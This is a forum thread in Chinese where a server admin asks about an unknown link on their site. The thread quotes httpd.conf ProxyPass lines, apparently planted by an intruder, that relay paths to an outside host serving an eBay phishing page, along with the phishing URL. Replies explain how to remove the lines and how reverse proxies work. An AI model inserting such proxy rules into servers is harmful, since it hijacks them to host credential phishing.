iT邦幫忙

0

Linux不明的網站連結

我的mail-server有架網頁,可是被加入了一段連結經過解析後為下面的網址,
http://61.218.177.195/sc/saw-cgi/eBayISAPI.dll/?cmd=SignIn&co\_partnerId=2&pUserId=&email=SEEmyEBAYstuff@aol.com&siteid=0&pageType=&pa1=&i1=&bshowgif=&UsingSSL=&ru=&pp=&pa2=&errmsg=&runame=&ruparams=&ruproduct=&sid=&favoritenav=&confirm=&ebxPageType=&existingEmail=&isCheckout=&migrateVisitor&MfcISAPICommand=ConfirmRegistration
我找很久也沒找不出被放置的不明網頁在那裡;但是在httpd.conf裡我有找到一段很奇怪的設定
Dynamic Shared Object (DSO) Support 這一段
LoadModule autoindex_module modules/mod_autoindex.so
LoadModule asis_module modules/mod_asis.so
LoadModule info_module modules/mod_info.so
LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
LoadModule negotiation_module modules/mod_negotiation.so
LoadModule dir_module modules/mod_dir.so
LoadModule imap_module modules/mod_imap.so
LoadModule actions_module modules/mod_actions.so
LoadModule speling_module modules/mod_speling.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule alias_module modules/mod_alias.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule cache_module modules/mod_cache.so
LoadModule suexec_module modules/mod_suexec.so
LoadModule disk_cache_module modules/mod_disk_cache.so
LoadModule file_cache_module modules/mod_file_cache.so
LoadModule mem_cache_module modules/mod_mem_cache.so
LoadModule cgi_module modules/mod_cgi.so
ProxyRequests on
ProxyPass /sc/ http://198.212.180.40:4100/sc/
ProxyPassReverse /sc/ http://198.212.180.40:4100/sc/
ProxyPass /cmd-confirm/ http://198.212.180.40:4100/cmd-confirm/
ProxyPassReverse /cmd-confirm/ http://198.212.180.40:4100/cmd-confirm/
我在推測是不是這一個部份所導致的!
請各位大大不吝指教!

2 個回答

12
grundy40
iT邦新手 2 級 ‧ 2008-08-13 11:57:22
最佳解答

使用FireFox瀏覽你的網站已出現

**已知的偽造網站!

這個在 61.218.177.195 的網站已被回報是偽造網站,依據你所選擇的安全設定予以阻擋。
偽造網站是特別設計成你所信任的網站,用來誘騙使用者透露其個人或財務資訊。

在這個網站輸入的任何資訊都會導致身分被盜用或遭受其他詐騙行為。**
你的apache設定檔已經確定被寫入惡意連結了,Apache本身有內建proxy功能,如果你確定你沒架設proxy或設定apache預設使用特定proxy在http://198.212.180.40:4100位置,大可將httpd.conf裡DSO最後面的proxy功能全都delete。有時間就多看看系統log看是怎樣被入侵的,

198.212.180.40經IP查詢
OrgName: Market Knowledge, Inc.
OrgID: MARKET-21
Address: 747 East 22nd Street
City: Lombard
StateProv: IL
PostalCode: 60148
Country: US

8
fishk
iT邦大師 1 級 ‧ 2008-08-13 13:29:58

你可能要先澄清一下
198.212.180.40及61.218.177.195是內部主機還是外部主機

httpd.conf中相關敍述指的是proxy的設定

一般的 Proxy 主機,是服務內部的 Client 上網用的,通常都是用 Squid 架設,
同時為了存取效率及節省頻寬, Squid 本身也提供 Cache 的功能,所以一般 Proxy
主機也稱為 Proxy Cache Server 代理快取伺服器.

R-Proxy 本身也是一種代理伺服器,那個 R 代表的是 Reverse 反向的意思,
最主要的用途是反過來代理,替 Internet 的使用者代理存取內部受限制的網站,
假如有開啟 Cache 功能,它同樣可以提供 File Cache 的功能,簡單來說 R-Proxy
就像是把 Proxy 的架構及需求,反向過來,使用者角色對調的意思

R-Proxy 基本觀念及相關解說請參考下列網址
http://bbs.ecstart.com/thread-13547-1-1.html

我要發表回答

立即登入回答